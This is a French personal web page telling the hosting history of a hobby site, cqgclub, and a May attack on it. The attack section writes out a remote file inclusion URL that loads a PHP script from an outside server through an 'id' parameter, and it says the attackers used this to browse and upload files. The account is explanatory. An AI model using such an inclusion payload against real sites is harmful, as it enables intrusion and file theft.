stylestyle
cqgclub RSS
Date de création : 6 juin 2007

L'historique du cqgclub.

Naissance du cqgclub

Le cqgclub est créé le 11 décembre 2006.
Il est d'abord hébergé sur un espace perso alloué par mon hébergeur : http://perso.numericable.fr/cqgclub.
Mais l'URL trop longue et pas assez personnelle me prend rapidement la tête.
Ayant souscrit à un abonnement gratuit chez http://www.dyndns.fr/ pour pouvoir contacter mon ordinateur à tout lieu tout moment, je décide de mettre en route une vieille (très vieille) machine pour héberger mon site.
L'OS est windows XP_PRO et le serveur est IIS.
Un peu déçu par les performances et la stabilité du serveur, je cherche une solution légère et facile à mettre en oeuvre.
Je passe porte alors le site sur un serveur portable : movamp.
Mais celui-ci n'est pas prévu pour la production. Php est facile à paramétrer, mais la documentation est assez faible.
En mars 2007, je transporte cqgclub sur un autre serveur portable : le très excellent Zazou Mini Web Serveur.
Celui est encore plus léger, plus stable et est adapté aux sites en production.
Mais la machine faisant office de serveur est vraiment trop lente et je n'arrive pas à installer de Linux dessus.
Je décide donc d'utiliser mon deuxième ordinateur, un mac intel 21 pouces flambant neuf.
Celui-ci dispose d'apache version 1, mais cela ne me convient pas, j'essaie d'installer apache2, mais ne trouve pas le moyen d'y parvenir.
Au bout de plusieurs heures de tentatives se soldant par des échecs, je décide d'utiliser MAMP (Mac Apache Mysql Php).
Cette compilation est conçue pour le développement, mais après plusieurs heures de modifications, j'arrive à quelque chose de plutôt bien sécurisé et je balance enfin la vieille machine située dans le meuble du téléviseur et de gagner de la vitesse en terme de navigation.

Référencement

Début mai, je référence cqgclub sur google et l'inscrit sur plusieurs annuaires du web.
Ceci me permet d'avoir plus de visites, mais aussi beaucoup de spams.

Attaque

Le 20 mai, le cqgclub subit une attaque sévère. Un hacker profite d'une faille qui m'avait échappée.
Le hacker a profité de la façon dont les pages dynamiques sont affichées en rentrant une URL telle que :
http://cqgclub.dyndns.org/index.php?id=http://serveur.gratuit/page_de_hacker.txt
Ceci permit au pirate d'afficher un formulaire sur la page du cqgclub et de rentrer des scripts php.
Ces scripts lui ont permit de rentrer dans le système de fichiers pour trouver des documents tels que musique, video, mots de passe.
Fort heureusement, toutes ces tentatives se sont soldées par des échecs.
Un autre hacker a utilisé un formulaire tout prêt lui permettant de trouver le nom de l'ordinateur, de l'utilisateur et du groupe de l'utilisateur, mais aussi de transférer des fichiers sur le site cqgclub.

changement d'ordinateur

Fin mai j'étudie l'utilisation des bases de données relationnelles pour modifier des erreurs invalidantes et ralentissant la navigation sur le cqgclub.
En effet, toutes les pages affichées dynamiquement sont affichables de manière autonome. Ce qui implique que le cqgclub est affublé de 2 balises <html> et <body> ainsi que 2 entêtes ( balises <head> et </head>) afin d'afficher des mots clés, un titre et une meta description différente pour chaque document.
Désormais ces informations sont contenues dans une base de données et la navigation est bien plus rapide sur cqgclub.

Valid XHTML 1.0 Transitional